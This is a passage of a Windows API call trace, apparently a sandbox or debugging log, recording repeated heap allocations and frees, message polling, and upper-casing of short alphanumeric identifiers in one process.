(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0190.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0190.108] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0190.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.108] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.109] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0190.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0190.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0190.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0190.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0190.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.109] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.109] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0190.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.110] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.110] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0190.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0190.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0190.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0190.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0190.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0190.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0190.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0190.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.111] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0190.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0190.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0190.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.111] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.112] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.112] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.112] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.112] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.112] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.113] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.113] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.113] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.113] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.113] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.114] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.114] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.114] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.115] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.115] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.115] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.115] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.115] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.115] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.116] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0190.116] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.116] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.116] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0190.117] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0190.117] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.117] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.117] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.117] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0190.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0190.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.117] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0190.117] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.117] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0190.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: 